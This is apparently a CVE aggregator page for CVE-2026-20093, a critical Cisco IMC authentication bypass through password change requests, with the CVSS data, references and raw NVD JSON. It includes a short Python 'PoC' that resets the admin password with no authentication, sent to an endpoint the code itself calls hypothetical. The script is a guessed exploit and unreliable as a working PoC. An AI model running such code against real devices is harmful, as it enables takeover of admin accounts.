CVE-2026-20093

Description

A vulnerability in the change password functionality of Cisco Integrated Management Controller (IMC) could allow an unauthenticated, remote attacker to bypass authentication and gain access to the system as Admin. This vulnerability is due to incorrect handling of password change requests. An attacker could exploit this vulnerability by sending a crafted HTTP request to an affected device. A successful exploit could allow the attacker to bypass authentication, alter the passwords of any user on the system, including an Admin user, and gain access to the system as that user.

CVSS Details

CVSS Score

9.8

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Cisco Integrated Management Controller (IMC) (具体受影响版本请参考官方公告)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Target URL for password change (Hypothetical endpoint based on description)
target_url = "https://<target-ip>/password-change"

# Attacker controlled data
payload = {
    "username": "admin",
    "new_password": "AttackerP@ssw0rd!"
}

try:
    # Sending crafted request without authentication headers
    response = requests.post(target_url, data=payload, verify=False, timeout=10)
    
    if response.status_code == 200:
        print("[+] Exploit successful! Admin password changed.")
    else:
        print(f"[-] Exploit failed. Status code: {response.status_code}")

except Exception as e:
    print(f"[-] Error: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-20093
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-20093
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-20093/
[4] VulDB https://vuldb.com/cve/CVE-2026-20093
[5] https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-cimc-auth-bypass-AgG2BxTn

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-20093", "sourceIdentifier": "[email protected]", "published": "2026-04-01T17:28:29.027", "lastModified": "2026-04-03T16:11:11.357", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability in the change password functionality of Cisco Integrated Management Controller (IMC) could allow an unauthenticated, remote attacker to bypass authentication and gain access to the system as Admin.\r\n\r\nThis vulnerability is due to incorrect handling of password change requests. An attacker could exploit this vulnerability by sending a crafted HTTP request to an affected device. A successful exploit could allow the attacker to bypass authentication, alter the passwords of any user on the system, including an Admin user, and gain access to the system as that user."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-20"}]}], "references": [{"url": "https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-cimc-auth-bypass-AgG2BxTn", "source": "[email protected]"}]}}